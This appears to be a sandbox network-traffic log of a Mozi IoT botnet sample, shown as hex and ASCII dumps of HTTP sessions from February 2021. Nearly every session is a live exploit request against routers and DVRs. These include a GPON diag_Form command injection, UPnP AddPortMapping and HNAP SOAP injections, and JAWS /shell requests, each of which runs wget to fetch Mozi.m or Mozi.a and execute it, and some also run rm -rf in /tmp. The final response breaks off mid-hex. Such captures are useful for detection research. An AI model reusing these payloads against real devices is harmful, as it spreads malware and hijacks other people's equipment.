                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:36:48.232862949 CET557INHTTP/1.0 302 Found
                                                                                                                  Pragma: no-cache
                                                                                                                  Location: https://113.161.185.44:443/HNAP1/
                                                                                                                  Content-type: text/html
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 33 30 32 20 44 6f 63 75 6d 65 6e 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 31 33 2e 31 36 31 2e 31 38 35 2e 34 34 3a 34 34 33 2f 48 4e 41 50 31 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="https://113.161.185.44:443/HNAP1/">here</A>.<P></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  12192.168.2.205741441.57.99.9280
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:54.947834969 CET590OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:36:55.159195900 CET590INHTTP/1.1 501 Not Implemented
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Length: 121
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:52 GMT
                                                                                                                  Expires: 0
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  13192.168.2.2056274176.116.205.20052869
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:55.819859028 CET599OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                                  Content-Length: 630
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                                  Accept: /
                                                                                                                  User-Agent: Hello-World
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                                  Feb 6, 2021 11:36:55.887101889 CET600INHTTP/1.1 500 Internal Server Error
                                                                                                                  CONTENT-LENGTH: 451
                                                                                                                  CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                                  DATE: Sat, 01 Jan 2000 00:21:12 GMT
                                                                                                                  EXT:
                                                                                                                  SERVER: Linux/2.6.21.5, UPnP/1.0, Portable SDK for UPnP devices/1.6.6
                                                                                                                  X-User-Agent: redsonic
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 0a 3c 73 3a 42 6f 64 79 3e 0a 3c 73 3a 46 61 75 6c 74 3e 0a 3c 66 61 75 6c 74 63 6f 64 65 3e 73 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 0a 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 55 50 6e 50 45 72 72 6f 72 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 0a 3c 64 65 74 61 69 6c 3e 0a 3c 55 50 6e 50 45 72 72 6f 72 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 63 6f 6e 74 72 6f 6c 2d 31 2d 30 22 3e 0a 3c 65 72 72 6f 72 43 6f 64 65 3e 34 30 31 3c 2f 65 72 72 6f 72 43 6f 64 65 3e 0a 3c 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 49 6e 76 61 6c 69 64 20 41 63 74 69 6f 6e 3c 2f 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 0a 3c 2f 55 50 6e 50 45 72 72 6f 72 3e 0a 3c 2f 64 65 74 61 69 6c 3e 0a 3c 2f 73 3a 46 61 75 6c 74 3e 0a 3c 2f 73 3a 42 6f 64 79 3e 0a 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0a
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  14192.168.2.2043404170.135.128.180
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:57.954531908 CET611OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:36:58.425070047 CET612OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:36:59.369103909 CET615OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  15192.168.2.2048524193.248.153.7680
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:01.979513884 CET626OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 193.248.153.76:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  16192.168.2.204555672.200.237.13649152
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:02.283832073 CET628OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                                  Host: 72.200.237.136:49152
                                                                                                                  Content-Length: 630
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 2f 74 6d 70 2f 4d 6f 7a 69 2e 6d 20 64 6c 69 6e 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 36 33 34 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 35 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 53 4f 41 50 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 45 4e 56 3a 65 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
                                                                                                                  Feb 6, 2021 11:37:02.489744902 CET629INHTTP/1.1 500 Internal Server Error
                                                                                                                  CONTENT-LENGTH: 412
                                                                                                                  CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                                  DATE: Sat, 06 Feb 2021 10:36:58 GMT
                                                                                                                  EXT:
                                                                                                                  SERVER: Linux/2.6.39.3, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
                                                                                                                  X-User-Agent: redsonic
                                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 0a 3c 73 3a 42 6f 64 79 3e 0a 3c 73 3a 46 61 75 6c 74 3e 0a 3c 66 61 75 6c 74 63 6f 64 65 3e 73 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 0a 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 55 50 6e 50 45 72 72 6f 72 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 0a 3c 64 65 74 61 69 6c 3e 0a 3c 55 50 6e 50 45 72 72 6f 72 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 63 6f 6e 74 72 6f 6c 2d 31 2d 30 22 3e 0a 3c 65 72 72 6f 72 43 6f 64 65 3e 34 30 31 3c 2f 65 72 72 6f 72 43 6f 64 65 3e 0a 3c 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 49 6e 76 61 6c 69 64 20 41 63 74 69 6f 6e 3c 2f 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 0a 3c 2f 55 50 6e 50 45 72 72 6f 72 3e 0a 3c 2f 64 65 74 61 69 6c 3e 0a 3c 2f 73 3a 46 61 75 6c 74 3e 0a 3c 2f 73 3a 42 6f 64 79 3e 0a 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0a
                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  17192.168.2.205508674.79.213.3880
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:16.898340940 CET702OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 74.79.213.38:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:37:17.053585052 CET704INHTTP/1.1 404 Not Found
                                                                                                                  X-FRAME-OPTIONS: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Set-Cookie: JSESSIONID=3A702A1A2E0723FAF83AC332C5FFF456; Path=/; HttpOnly
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                  Content-Length: 993
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:16 GMT
                                                                                                                  Server: CJServer/1.1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 0a 3c 53 54 59 4c 45 3e 0a 68 74 6d 6c 20 7b 7d 0a 3c 2f 53 54 59 4c 45 3e 0a 0a 3c 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6a 70 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 45 72 72 6f 72 53 65 72 76 6c 65 74 22 2f 3e 0a 3c 4c 49 4e 4b 20 49 44 3d 22 63 74 72 6c 53 74 79 6c 65 73 22 20 52 45 4c 3d 53 54 59 4c 45 53 48 45 45 54 20 54 59 50 45 3d 22 74 65 78 74 2f 63 73 73 22 20 48 52 45 46 3d 22 2f 5f 63 6f 6d 6d 6f 6e 2f 6c 76 6c 35 2f 69 6e 63 6c 75 64 65 73 2f 70 72 6f 70 65 72 74 69 65 73 5f 63 6f 6e 74 72 6f 6c 73 74 79 6c 65 73 5f 63 73 73 2e 6a 73 70 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 42 4f 44 59 3e 0a 3c 53 43 52 49 50 54 20 4c 41 4e 47 55 41 47 45 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0a 0a 